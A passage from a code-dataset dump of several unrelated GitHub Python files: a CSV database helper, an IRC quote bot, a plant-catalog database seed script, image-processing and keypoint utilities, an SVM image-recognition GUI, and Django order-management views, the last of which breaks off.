isinstance(o_data,list):\n for x_dict in o_data:\n dic={}\n try:\n for x in kwargs['key']:dic[x] = x_dict[x]\n except:pass\n r_data['data'].append(dic)\n else:\n dic={}\n try:\n for x in kwargs['key']:dic[x] = o_data[x]\n except:pass\n r_data['data'].append(dic)\n return r_data\n\nclass csv:\n def __init__(self,file_path=None): \n self.file_path = file_path\n \n def csv_read(self,file_path=None,**kwargs):\n if file_path is not None:self.file_path = file_path\n kwargs = extract_kwargs(kwargs,\"\")\n def checkdigit(num):\n if \"no_int\" in kwargs:return num\n else:\n if num.isdigit():return int(num)\n else:\n try:return float(num)\n except:return num\n if 'csv_str' in kwargs:csvreader = csvm.reader([x for x in kwargs['csv_str'].splitlines() if x != \"\" or x.isspace()])\n else:\n with open(self.file_path, 'r') as csvfile:\n csvreader = csvm.reader(csvfile)\n self.fields = list(filter(lambda x: x != \"\", next(csvreader)))\n rows = [row for row in csvreader]\n self.rows_num = csvreader.line_num\n data = {\"data\":[],\"status\":1}\n for row in rows[kwargs['f_a']:kwargs['l_a']]:\n if any(row):\n dic,c = {},0\n for col in row[:len(self.fields)]:\n dic[self.fields[c]] = checkdigit(col)\n c+=1\n data['data'].append(dic)\n return data\n \n def csv_filter(self,*command_tup,**kwargs):\n kwargs = extract_kwargs(kwargs,self.file_path)\n if 'dict' in kwargs:all_data=kwargs.pop('dict')['data']\n else:all_data = self.csv_read(**kwargs)['data']\n r_data,command_arr= {\"data\":[],'status':1},[]\n if OR in command_tup:\n for x_p in command_tup:\n if x_p != OR:command_arr.append(x_p)\n for command in command_arr:\n data_get = andfilter(command,all_data,kwargs)\n for x in data_get:\n if x not in r_data['data']:r_data['data'].append(x)\n return r_data\n else:\n for x_r in andfilter(command_tup[0],all_data,kwargs):r_data['data'].append(x_r)\n return r_data\n \n def csv_write(self,data,file_path=None,**kwargs):\n if 'write' in kwargs and kwargs['write'] is False:\n csv_str = ''\n csv_str+=','.join(list(data['data'][0].keys()))\n csv_str+=''.join([f\"{','.join(map(str, x.values()))}\\n\" for x in data['data']])\n return csv_str\n else:\n with open(file_path, 'w', newline='') as file:\n writer = csvm.writer(file)\n writer.writerow(list(data['data'][0].keys()))\n writer.writerows([x.values() for x in data['data']])\n return {f\"Sucesss! {file_path} Is Created.\"}\n \n def csv_sort(self,dict_data,sort_key,**kwargs):\n kwargs,order,r_data = extract_kwargs(kwargs,self.file_path),False,{\"data\":dict_data['data'],\"status\":1}\n if \"order\" in kwargs:order = kwargs['order']\n if isinstance(sort_key,set):\n key_tup = \"i\"+str([[x] for x in sort_key])[1:-1].replace(', ',\"\")\n r_data['data'] = sorted(r_data['data'][kwargs['f_a']:kwargs['l_a']], key = lambda i:(exec('global s;s = %s' % key_tup),s),reverse=order)\n else: \n if isinstance(sort_key,str):r_data['data'][kwargs['f_a']:kwargs['l_a']] = sorted(r_data['data'],key = lambda i: i[sort_key],reverse=order)\n return r_data\n \n def csv_trash(self,command):\n data = self.read()\n for x in data['data']:\n if findDiff(command,x):data['data'].remove(x)\n return data\n\n def csv_update(self,data_arg=None,**kwargs):\n if \"where\" in kwargs:\n data = self.csv_read()\n for x in data['data']:\n if findDiff(command,x):x.update(data_arg)\n return data","repo_name":"shivjeetbhullar/pi7db","sub_path":"pi7db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"17806734299","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport urllib\nimport htmllib\n\nimport formatter\nimport string\nimport re\nimport random\n\nfrom ircbot import SingleServerIRCBot\nfrom irclib import nm_to_n, nm_to_h, irc_lower, ip_numstr_to_quad\n\nquote_url = \"http://www.quotationspage.com/search.php3?homesearch=\"\nquote_nfm = [\n \"ei se kaveri ole koskaan sanonut mitään järkevää\",\n \"en mä nyt kuule jaksa. Googlaa itte?\",\n \"kuka se semmonen muka on?\",\n \"koskaan kuullukkaan koko tyypistä!\",\n \"ei mun tietokannassa nyt ihan jokaista ole joka on joskus jotakin suustaan päästänyt.\",\n \"valitettavasti nyt kuule en. Ei nimittääin löydy.\"\n ]\n\nclass parser(htmllib.HTMLParser):\n\n def __init__(self, verbose=0):\n self.state = 0\n self.output = []\n f = formatter.NullFormatter()\n htmllib.HTMLParser.__init__(self, f, verbose)\n\n def start_dt(self,attrs):\n for i in attrs:\n if i == (\"class\",\"quote\"):\n self.state = 1;\n self.save_bgn()\n \n def end_dt(self):\n if self.state == 1:\n self.output.append(\"%s \"%self.save_end())\n self.state = 0;\n \ndef setup(self):\n self.pubcommands['quote'] = quote\n\ndef quote(self,e,c):\n\n line = e.arguments()[0]\n\n query = string.join(line.split()[1:], \"+\")\n pg = 1;\n\n # Get the first page and see it there is more\n fd = urllib.urlopen(\"%s%s&page=%d\"%(quote_url,query,pg))\n page = fd.read()\n fd.close\n\n m = re.search('age \\d of (\\d+)',page)\n\n if m:\n pg = random.randint(1,int(m.group(1)))\n \n if pg != 1:\n fd = urllib.urlopen(\"%s%s&page=%d\"%(quote_url,query,pg))\n page = fd.read()\n fd.close\n \n p = parser()\n p.feed(page)\n \n if len(p.output) < 1:\n nick = nm_to_n(e.source())\n c.privmsg(e.target(), \"%s, %s\"%(nick,random.choice(quote_nfm)))\n return\n \n c = self.connection\n messu = re.sub(\"\\[\\d+\\]\\s?$\",\"\",random.choice(p.output))\n # messu += \" (%s, page %d of %d)\"%(query,pg,int(m.group(1)))\n c.privmsg(e.target(), \"%s\"%messu)\n\n","repo_name":"olawi/oksanen","sub_path":"modules/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12712234765","text":"from sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\n\r\n\r\nfrom database_setup import Base, Category, Item, User\r\n\r\n\r\nengine = create_engine('postgresql://catalog:postgres@localhost/catalog')\r\n# Bind the engine to the metadata of the Base class so that the\r\n# declaratives can be accessed through a DBSession instance\r\nBase.metadata.bind = engine\r\n\r\n\r\nDBSession = sessionmaker(bind=engine)\r\n# A DBSession() instance establishes all conversations with the database\r\n# and represents a \"staging zone\" for all the objects loaded into the\r\n# database session object. Any change made against the objects in the\r\n# session won't be persisted into the database until you call\r\n# session.commit(). If you're not happy about the changes, you can\r\n# revert all of them back to the last commit by calling\r\n# session.rollback()\r\nsession = DBSession()\r\n\r\n\r\n# Create sample users\r\nUser0 = User(name=\"Oprah Winfrey\", email=\"oprah@oprah.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/6/65/Oprah_closeup.jpg')\r\nsession.add(User0)\r\nsession.commit()\r\nUser1 = User(name=\"Germaine Greer\", email=\"Germaine@Greer.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/a/a6/Germaine_Greer.jpg')\r\nsession.add(User1)\r\nsession.commit()\r\nUser2 = User(name=\"Heema Chopra\", email=\"heemachopra@gmail.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/a/ad/Indian_lady.jpg')\r\nsession.add(User2)\r\nsession.commit()\r\nUser3 = User(name=\"Ima Peruviana\", email=\"Peruviana@yahoo.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/9/9e/Old_zacatecas_lady.jpg')\r\nsession.add(User3)\r\nsession.commit()\r\nUser4 = User(name=\"Reema Sattarvand\", email=\"Reema@outlook.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/c/ca/Portrait_of_a_Persian_lady_in_Iran%2C_10-08-2006.jpg')\r\nsession.add(User4)\r\nsession.commit()\r\n\r\n\r\n# Create sample categories\r\ncategory0 = Category(user_id=1, name=\"Bushes\")\r\nsession.add(category0)\r\nsession.commit()\r\ncategory1 = Category(user_id=2, name=\"Wildflowers\")\r\nsession.add(category1)\r\nsession.commit()\r\ncategory2 = Category(user_id=3, name=\"Edible Plants\")\r\nsession.add(category2)\r\nsession.commit()\r\ncategory3 = Category(user_id=3, name=\"Striking Plants\")\r\nsession.add(category3)\r\nsession.commit()\r\ncategory4 = Category(user_id=3, name=\"Useful Plants\")\r\nsession.add(category4)\r\nsession.commit()\r\n\r\n# Create sample items\r\nnewitem0 = Item(user_id=0, name=\"Desert Peach\",\r\n description=\"Beautiful pink flowers, part of the rose family\",\r\n category=category0)\r\nsession.add(newitem0)\r\nsession.commit()\r\nnewitem1 = Item(user_id=0, name=\"Wyoming Big Sagebrush\",\r\n description=\"Fire hazard because of flammable, volatile oils\",\r\n category=category0)\r\nsession.add(newitem1)\r\nsession.commit()\r\nnewitem2 = Item(user_id=0, name=\"Snowbrush\",\r\n description=\"Burns with high intensity, fragrant flowers attract bees\",\r\n category=category0)\r\nsession.add(newitem2)\r\nsession.commit()\r\nnewitem3 = Item(user_id=1, name=\"California Poppy\",\r\n description=\"Has sedative and pain-reducing properties\",\r\n category=category1)\r\nsession.add(newitem3)\r\nsession.commit()\r\nnewitem4 = Item(user_id=1, name=\"Desert Paintbrush\",\r\n description=\"Striking red flowers\",\r\n category=category1)\r\nsession.add(newitem4)\r\nsession.commit()\r\nnewitem5 = Item(user_id=1, name=\"Desert Sunflower\",\r\n description=\"Beautiful and tough\",\r\n category=category1)\r\nsession.add(newitem5)\r\nsession.commit()\r\nnewitem6 = Item(user_id=2, name=\"Prickly Pear Cactus\",\r\n description=\"Juicy red fruits\",\r\n category=category2)\r\nsession.add(newitem6)\r\nsession.commit()\r\nnewitem7 = Item(user_id=2, name=\"Desert Gooseberry\",\r\n description=\"Thorny, Fruit can be used for pies\",\r\n category=category2)\r\nsession.add(newitem7)\r\nsession.commit()\r\nnewitem8 = Item(user_id=2, name=\"Western Serviceberry\",\r\n description=\"Edible fruit\",\r\n category=category2)\r\nsession.add(newitem8)\r\nsession.commit()\r\nnewitem9 = Item(user_id=3, name=\"Joshua Tree\",\r\n description=\"30 ft tall: Iconic, but not really a tree!\",\r\n category=category3)\r\nsession.add(newitem9)\r\nsession.commit()\r\nnewitem10 = Item(user_id=3, name=\"Rubber Rabbitbrush\",\r\n description=\"Bright yellow flowers, beware the pollen!\",\r\n category=category3)\r\nsession.add(newitem10)\r\nsession.commit()\r\nnewitem11 = Item(user_id=3, name=\"Spiny hopsage\",\r\n description=\"Interesting rose colored flowers\",\r\n category=category3)\r\nsession.add(newitem11)\r\nsession.commit()\r\nnewitem12 = Item(user_id=4, name=\"Yucca\",\r\n description=\"Edible flowers and useful fibers from leaves\",\r\n category=category4)\r\nsession.add(newitem12)\r\nsession.commit()\r\nnewitem13 = Item(user_id=4, name=\"Sumac\",\r\n description=\"Acidic red flowers can be made into a drink\",\r\n category=category4)\r\nsession.add(newitem13)\r\nsession.commit()\r\nnewitem14 = Item(user_id=4, name=\"Pinyon\",\r\n description=\"Where yummy pine nuts come from\",\r\n category=category4)\r\nsession.add(newitem14)\r\nsession.commit()\r\n\r\nprint(\"Added Sample Plant Content!\")\r\n","repo_name":"OmSerenity/Item-Catalog","sub_path":"catalog/generate_dbinfo.py","file_name":"generate_dbinfo.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41514699438","text":"from tkinter import messagebox\n\nclass Name:\n def __init__(self, firstName, lastName):\n self.firstName = firstName\n self.lastName = lastName\n\ndef saveToFile(treeView):\n\n try:\n with open(\"data.txt\", \"w\") as file:\n for row in treeView.get_children():\n file.write(treeView.item(row)['values'][0] + \",\" + treeView.item(row)['values'][1] + \"\\n\")\n except Exception:\n messagebox.showinfo(\"SaveFile\", \"File couldn't be saved\")\n\n\ndef addNewName(treeView, name):\n if name.firstName == \"\" or name.lastName == \"\":\n messagebox.showinfo(\"Input\", \"The first or last name is missing!\")\n else:\n treeView.insert('', 'end', values=(name.firstName, name.lastName))\n\n\ndef readFromFile(treeView):\n try:\n file = open(\"data.txt\", \"r\")\n for row in treeView.get_children():\n treeView.delete(row)\n for row in file:\n strippedRow = row.strip('\\n')\n name = strippedRow.split(',', 1)\n treeView.insert('', 'end', values=(name[0], name[1]))\n file.close()\n except Exception:\n messagebox.showinfo(\"OpenFile\", \"File couldn't be read\")","repo_name":"csroli95/Szkript-nyelvek","sub_path":"sajatmodul.py","file_name":"sajatmodul.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7815630288","text":"from random import gauss\nimport pycocotools.mask as mask_utils\nimport numpy as np\nfrom plyfile import PlyData\nfrom PIL import Image\nimport math\n\n\ndef binary_mask_to_polygon(binary_mask, tolerance=0):\n polygons = []\n # pad mask to close contours of shapes which start and end at an edge\n padded_binary_mask = np.pad(binary_mask, pad_width=1, mode='constant', constant_values=0)\n contours = measure.find_contours(padded_binary_mask, 0.5)\n contours = np.subtract(contours, 1)\n for contour in contours:\n contour = measure.approximate_polygon(contour, tolerance)\n if len(contour) <= 4:\n continue\n contour = np.flip(contour, axis=1)\n contour = np.round(np.maximum(contour, 0)).astype(np.int32)\n polygons.append(contour)\n return polygons\n\n\ndef coco_poly_to_mask(poly, h, w):\n rles = mask_utils.frPyObjects(poly, h, w)\n rle = mask_utils.merge(rles)\n mask = mask_utils.decode(rle)\n return mask\n\n\ndef compute_vertex(mask, kpt_2d):\n h, w = mask.shape\n m = kpt_2d.shape[0]\n xy = np.argwhere(mask == 1)[:, [1, 0]]\n\n vertex = kpt_2d[None] - xy[:, None]\n norm = np.linalg.norm(vertex, axis=2, keepdims=True)\n norm[norm < 1e-3] += 1e-3\n vertex = vertex / norm\n\n vertex_out = np.zeros([h, w, m, 2], np.float32)\n vertex_out[xy[:, 1], xy[:, 0]] = vertex\n vertex_out = np.reshape(vertex_out, [h, w, m * 2])\n\n return vertex_out\n\n# https://stackoverflow.com/questions/69024270/how-to-create-a-normal-2d-distribution-in-pytorch\ndef gaussian_2d(x=0, y=0, mx=0, my=0, sx=1, sy=1):\n return 1 / (2*math.pi*sx*sy) * \\\n np.exp(-((x - mx)**2 / (2*sx**2) + (y - my)**2 / (2*sy**2)))\n\ndef compute_vertex_distribution(mask, kpt_2d, sigma = 10):\n h, w = mask.shape\n m = kpt_2d.shape[0]\n x = np.linspace(0,w,w)\n y = np.linspace(0,h,h)\n x,y = np.meshgrid(x,y)\n distribs = np.zeros((m,h,w))\n for i,(x0, y0) in enumerate(kpt_2d):\n dist = gaussian_2d(x, y, mx = x0, my = y0, sx=sigma, sy=sigma)\n norm_factor = np.max(dist)\n dist = 1 - dist/norm_factor\n distribs[i] += dist\n return distribs\n\n\ndef get_ply_model(model_path):\n ply = PlyData.read(model_path)\n data = ply.elements[0].data\n x = data['x']\n y = data['y']\n z = data['z']\n model = np.stack([x, y, z], axis=-1)\n return model\n\n\ndef read_linemod_mask(path, ann_type, cls_idx):\n if ann_type == 'real':\n mask = np.array(Image.open(path))\n if len(mask.shape) == 3:\n return (mask[..., 0] != 0).astype(np.uint8)\n else:\n return (mask != 0).astype(np.uint8)\n elif ann_type == 'fuse':\n return (np.asarray(Image.open(path)) == cls_idx).astype(np.uint8)\n elif ann_type == 'render':\n return (np.asarray(Image.open(path))).astype(np.uint8)\n\n\ndef read_tless_mask(ann_type, path):\n if ann_type == 'real':\n return (np.asarray(Image.open(path))).astype(np.uint8)\n elif ann_type == 'render':\n depth = np.asarray(Image.open(path))\n return (depth != 65535).astype(np.uint8)\n","repo_name":"ivano-donadi/KVN","sub_path":"pvnet/lib/utils/pvnet/pvnet_data_utils.py","file_name":"pvnet_data_utils.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"1231599834","text":"import numpy as np\nfrom scipy.ndimage import convolve\nimport matplotlib.pyplot as plt\n\n\ndef sobel():\n a1 = np.matrix([1, 2, 1])\n a2 = np.matrix([-1, 0, 1])\n Kx = a1.T * a2\n Ky = a2.T * a1\n return Kx, Ky\n\n\ndef robert():\n Kx = np.array([[1, 0], [0, -1]])\n Ky = np.array([[0, 1], [-1, 0]])\n return Kx, Ky\n\n\ndef canny():\n Kx = np.array([-1, 0, 1])\n Ky = np.array([1, 0, 1])\n Kx = np.reshape(Kx, (1, 3))\n Ky = np.reshape(Kx, (3, 1))\n return Kx, Ky.T\n\n\ndef compute_gradient(img: np.array,\n operator: str = 'sobel',\n return_xy_gradient: bool = False) -> np.array:\n '''Compute gradient.\n This function compute the gradient image (G)\n of the input image `img`.\n by convolution with an operator.\n\n Parameters:\n ----------\n img: np.array\n Input image.\n operator: str\n Operator to compute the gradient (Default is Sobel operator).\n Possible values can be:\n\n - sobel\n - canny\n - robert\n\n return_xy_gradient: bool\n Allows to returns Gx,Gy in additon to G\n\n Returns\n -------\n G: np.array\n Gradient image.\n G,Gx,Gy: tuple(np.array)\n If `return_xy_gradient=True`,\n returns gradient matrix in x,y direction.\n '''\n\n mapDict = {\n 'sobel': sobel,\n 'robert': robert,\n 'canny': canny\n }\n\n func = mapDict.get(operator)\n if func is None:\n raise ValueError(f'No operator called {operator} found.')\n Kx, Ky = func()\n # Apply the selected operator\n Gx = convolve(img, Kx)\n Gy = convolve(img, Ky)\n G = np.abs(Gx) + np.abs(Gy)\n if return_xy_gradient:\n return G, Gx, Gy\n return G\n\n\ndef distribution(img: np.array,\n operator: str = 'Sobel',\n ) -> None:\n G, Gx, Gy = compute_gradient(img=img,\n operator=operator,\n return_xy_gradient=True)\n x, y = np.ravel(Gx), np.ravel(Gy)\n mx, my = np.max(x), np.min(y)\n plt.figure()\n plt.scatter(x, y)\n plt.xlim((-2 * mx, 2 * mx))\n plt.xlim((-2 * my, 2 * my))\n plt.title('Distribution of image gradients.')\n plt.xlabel('Ix')\n plt.ylabel('Iy')\n plt.show()\n","repo_name":"LeoGim1997/Working","sub_path":"processing/gradient_filtering.py","file_name":"gradient_filtering.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"69910153855","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017/5/21\n\n@author: Naiive\n主函数\n\"\"\"\nfrom PIL import Image as IMG\nfrom PIL import ImageTk\nimport numpy as np\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom time import time\nimport matplotlib.pyplot as plt\nfrom get_eigenvalue import *\nfrom get_svm import *\nfrom tkinter import *\n\nroot = Tk()\nroot.title(\"基于深度学习的图像识别\")\nroot.geometry('510x280')\nmenubar = Menu(root)\n\n\n# Frame1 = Frame(root, height = 200,width = 400)\n# Frame2 = Frame(root, height = 200,width = 400)\n# Frame3 = Frame(root, height = 200,width = 400)\n# Frame1.pack()\n# Frame2.pack()\n# Frame3.pack(side = BOTTOM)\n\ntarget_n = None\nfilename = None\n\ncanvas = Canvas(root,\n width=500, # 指定Canvas组件的宽度\n height=600, # 指定Canvas组件的高度\n bg='white') # 指定Canvas组件的背景色\n# im = Tkinter.PhotoImage(file='img.gif') # 使用PhotoImage打开图片\nimage = IMG.open(\"bg.jpg\")\nim = ImageTk.PhotoImage(image)\n\ncanvas.create_image(300, 50, image=im) # 使用create_image将图片添加到Canvas组件中\n# canvas.create_text(302, 77, # 使用create_text方法在坐标(302,77)处绘制文字\n# text='Use Canvas' # 所绘制文字的内容\n# , fill='gray') # 所绘制文字的颜色为灰色\n# canvas.create_text(300, 75,\n# text='Use Canvas',\n# fill='blue')\ncanvas.pack() # 将Canvas添加到主窗口\n\n#采集数据库数据\ndef get():\n global pic, x_train, x_test, y_train, y_test, x_train1, x_test1, y_train1, y_test1\n global x_train0, x_test0, y_train0, y_test0, target_n\n global img_size\n global pca,clf\n pic = get_eigenvalue()\n print(pic.get_pca_eigen())\n print(\"------------------------------------------\")\n\n x_train, x_test, y_train, y_test = pic.get_data() # 存放图像降维后的灰度特征向量\n x_train1, x_test1, y_train1, y_test1 = pic.get_colordata() # 存放图像降维前的彩色特征向量\n x_train0, x_test0, y_train0, y_test0 = pic.get_graydata() # 存放图像降维前的灰度特征向量\n img_size = pic.get_img_size() # 记录各图片的h,w\n target_n = pic.get_target_n() # 存放图片名字,下面函数的target存放0,1,2.。这些数字,对应这里的序号\n pca = pic.get_pca()\n clf = SVM1(\"rbf\", [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1], pic)\n\n\ndef plot_gallary():\n\n # pic = get_eigenvalue()\n # print(pic.get_pca_eigen())\n # print(\"------------------------------------------\")\n # x_train, x_test, y_train, y_test = pic.get_data() # 存放图像降维后的灰度特征向量\n # x_train1, x_test1, y_train1, y_test1 = pic.get_colordata() # 存放图像降维前的彩色特征向量\n # x_train0, x_test0, y_train0, y_test0 = pic.get_graydata() # 存放图像降维前的灰度特征向量\n # img_size = pic.get_img_size() # 记录各图片的h,w\n # target_n = pic.get_target_n() # 存放图片名字,下面函数的target存放0,1,2.。这些数字,对应这里的序号\n if target_n == None:\n print (\"请先采集数据!\")\n return 0\n\n # 预测图片\n print(\"------------------------------------------\")\n print(\"正在预测图片...\")\n t0 = time()\n test_pred = clf.predict(x_test)\n print(\"完成预测,共计 %0.3f秒\" % (time() - t0))\n print(\"------------------------------------------\")\n print(\"预测结果如下:\")\n print(classification_report(y_test, test_pred, target_names=target_n))\n n_classes = pic.get_nclasses()\n print(confusion_matrix(y_test, test_pred, labels=range(n_classes)))\n print(\"------------------------------------------\")\n prediction = 0\n for i in range(len(test_pred)):\n if test_pred[i] == y_test[i]:\n prediction += 1\n precision_average = prediction / len(y_test)\n\n # test_pred存放预测结果,对应y_test\n print(\"预测的准确率为:\", precision_average)\n result = []\n for i in range(len(test_pred)):\n result.append({\"target:\": target_n[y_test[i]], \"predict:\": target_n[test_pred[i]]})\n for i in range(100):\n print(result[i])\n\n # 比较预测值和实际值\n def plot_gallery(images, titles, n_row=3, n_col=4):\n \"\"\"Helper function to plot a gallery of portraits\"\"\"\n plt.figure(figsize=(2.5 * n_col, 2.4 * n_row))\n plt.subplots_adjust(bottom=0, left=.01, right=.99, top=.90, hspace=.35, wspace=.35)\n for i in range(n_row * n_col):\n plt.subplot(n_row, n_col, i + 1)\n # plt.imshow(images[i].reshape((h, w)), cmap=plt.cm.gray)\n # image = images[i].reshape(h, w)\n # img = []\n # for j in range(len(image)):\n # img.append(list(image[j]))\n # #print(img[:5])\n plt.imshow(images[i])\n # plt.imshow(images[i])\n plt.title(titles[i], size=12)\n plt.xticks(())\n plt.yticks(())\n\n def title(y_pred, y_test, target_names, i):\n pred_name = target_names[y_pred[i]].rsplit(' ', 1)[-1]\n true_name = target_names[y_test[i]].rsplit(' ', 1)[-1]\n if y_pred[i] == y_test[i]:\n pre = \"(√)\"\n else:\n pre = '(×)'\n return 'predicted: %s%s\\ntrue: %s' % (pred_name, pre, true_name)\n\n def show_prediction():\n prediction_titles = [title(test_pred, y_test, target_n, i)\n for i in range(len(test_pred))]\n\n plot_gallery(x_test1, prediction_titles)\n\n # plot the gallery of the most significative eigenfaces\n\n # eigenface_titles = [\"eigenface %d\" % i for i in range(len(eigenfaces))]\n # plot_gallery(eigenfaces, eigenface_titles, h = 30, w = 18)\n\n plt.show()\n\n show_prediction()\n\n\ndef show_precise():\n # pic = get_eigenvalue()\n # print (pic.get_pca_eigen())\n # print(\"------------------------------------------\")\n # x_train, x_test, y_train, y_test = pic.get_data()#存放图像降维后的灰度特征向量\n # x_train1, x_test1, y_train1, y_test1 = pic.get_colordata()#存放图像降维前的彩色特征向量\n # x_train0, x_test0, y_train0, y_test0 = pic.get_graydata()#存放图像降维前的灰度特征向量\n # img_size = pic.get_img_size()#记录各图片的h,w\n # target_n = pic.get_target_n()#存放图片名字,下面函数的target存放0,1,2.。这些数字,对应这里的序号\n\n # test_pred, precision_average = SVM1(\"rbf\", [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1], pic)\n # #test_pred存放预测结果,对应y_test\n # print (\"预测的准确率为:\", precision_average)\n # result = []\n # for i in range(len(test_pred)):\n # result.append((y_test[i], test_pred[i]))\n if target_n == None:\n print(\"请先采集数据!\")\n return 0\n #绘制预测准确度的曲线\n def show_pecise():\n kernel_to_test = ['rbf', 'poly', 'sigmoid']\n\n for kernel_name in kernel_to_test:\n x_label = np.linspace(0.0001, 1, 100)\n y_label = []\n for i in x_label:\n a, b = SVM2(kernel_name, [i], pic)\n y_label.append(b)\n plt.plot(x_label, y_label, label=kernel_name)\n\n plt.xlabel(\"Gamma\")\n plt.ylabel(\"Precision\")\n plt.title('Different Kernels Contrust')\n plt.legend()\n plt.show()\n show_pecise()\n\ndef select():\n global filename\n filename = filedialog.askopenfilename(filetypes = [('JPG', '.jpg'), ('PNG', '.png'), ('BMP', '.bmp')])\n print (filename)\n\n\ndef predict():\n if filename == None:\n print('请先选择图片!')\n return 0\n if target_n == None:\n print (\"请先采集数据!\")\n return 0\n img0 = []\n im = IMG.open(filename)\n #self.pic_data_rgb.append(img.resize((50, 37)))\n #self.img_size.append(img.size)\n img = im.convert('L') # 原来的data是[(r,g,b)],现转为灰度图像[grey]\n img = img.resize((400, 200)) # 将图片转化为统一的格式,统一之后操作数组的长度\n img = img.getdata()\n img0.append(list(img))\n img = pca.transform(img0)\n img = np.array(img)\n prediction = clf.predict(img)\n print ('I guess you chose : ' + target_n[prediction[0]])\n # tkimg = ImageTk.PhotoImage(im) # 执行此函数之前, Tk() 必须已经实例化。\n # l = Label(Frame3, image=tkimg)\n # l.grid(row = 3, column = 0, sticky = NW, pady = 8, padx = 20)\n # l.show()\n plt.imshow(im)\n plt.title(\"I guess this is...\" + target_n[prediction[0]] + \"?\" )\n plt.axis('off') # clear x- and y-axes\n plt.show()\n #im.show() # 显示刚才所画的所有操作\n\n\n\n# b0 = Button(Frame1, text = \"采集数据库\", command = get, width=30, height=2, bd = 5)\n# b1 = Button(Frame1, text = \"显示预测结果\", command = plot_gallary, width=30, height=2,bd = 5)\n# b2 = Button(Frame1, text = \"显示预测准确度\", command = show_precise, width=30, height=2, bd = 5)\n# b3 = Button(Frame1, text = \"退出程序\", command = root.quit, width=30, height=2, bd = 5)\n# b4 = Button(Frame2, text = \"选择图片\", command = select, width=30, height=2, bd = 5)\n# b5 = Button(Frame2, text = \"预测\", command = predict, width=30, height=2, bd = 5)\n# b0.pack()\n# b1.pack()\n# b2.pack()\n# b3.pack()\n# b4.pack()\n# b5.pack()\n\nfilemenue = Menu(menubar, tearoff = False)\nfilemenue.add_command(label = \"采集数据\", command = get)\nfilemenue.add_separator()\nfilemenue.add_command(label = \"退出\", command = root.quit)\nmenubar.add_cascade(label = \"Start\", menu = filemenue)\n\ntestmenue = Menu(menubar, tearoff = False)\ntestmenue.add_command(label = \"预测结果\", command = plot_gallary)\ntestmenue.add_command(label = \"预测精度\", command = show_precise)\nmenubar.add_cascade(label = \"Test\", menu = testmenue)\n\nchoosemenu = Menu(menubar, tearoff = False)\nchoosemenu.add_command(label = \"选择图片\", command = select)\nchoosemenu.add_command(label = \"预测\", command = predict)\nmenubar.add_cascade(label = \"FreeRun\", menu = choosemenu)\n\n\nroot.config(menu = menubar)\n\nmainloop()","repo_name":"jumormt/PhotoClassifySVM","sub_path":"宝宝快点我.py","file_name":"宝宝快点我.py","file_ext":"py","file_size_in_byte":10179,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"79"} +{"seq_id":"7030957283","text":"from django.shortcuts import get_object_or_404, render, redirect\nfrom django.http import HttpResponse\nfrom .models import Order\nfrom .forms import OrderForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom .models import Image\nfrom django.conf import settings\nimport os\nimport logging\nimport uuid\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nimport io\nimport imghdr\nimport time\nlogger = logging.getLogger('django')\n\n\n@login_required\ndef orders_list(request):\n if request.user.is_superuser: # Если пользователь - суперпользователь, показываем все заказы\n orders = Order.objects.all()\n else:\n orders = Order.objects.filter(user=request.user) # Для обычного пользователя показываем только его заказы\n context = {'orders': orders}\n return render(request, 'list_orders.html', context)\n\n\n@login_required\ndef order_detail(request, pk):\n order = get_object_or_404(Order, pk=pk)\n if request.user == order.user or request.user.is_superuser:\n context = {'order': order}\n return render(request, 'detail_orders.html', context)\n else:\n messages.error(request, 'You do not have permission to view this order.')\n return redirect('orders_list')\n\n\n@login_required\ndef add_order1(request):\n if request.method == 'POST':\n form = OrderForm(request.POST)\n if form.is_valid():\n form.save(user=request.user)\n return redirect('orders_list')\n else:\n form = OrderForm()\n return render(request, 'add_order.html', {'form': form})\n\n\nfrom .forms import OrderForm, ImageInlineForm\nfrom django.forms import inlineformset_factory\n\n@login_required\ndef add_order(request):\n ImageFormSet = inlineformset_factory(Order, Image, form=ImageInlineForm, extra=3, can_delete=False)\n\n if request.method == 'POST':\n order_form = OrderForm(request.POST)\n formset = ImageFormSet(request.POST, request.FILES)\n\n if order_form.is_valid() and formset.is_valid():\n order = order_form.save(commit=False)\n order.user = request.user\n order.save()\n\n for form in formset:\n if form.cleaned_data.get('image'):\n image = form.save(commit=False)\n image.order = order\n image.save()\n return redirect('orders_list')\n else:\n order_form = OrderForm()\n formset = ImageFormSet()\n\n context = {\n 'order_form': order_form,\n 'formset': formset,\n }\n\n return render(request, 'add_order.html', context)\n\n\n@login_required\ndef delete_order(request, pk):\n order = get_object_or_404(Order, pk=pk)\n if request.user == order.user or request.user.is_superuser:\n order.delete()\n messages.success(request, 'Order deleted.')\n else:\n messages.error(request, 'You do not have permission to delete this order.')\n return 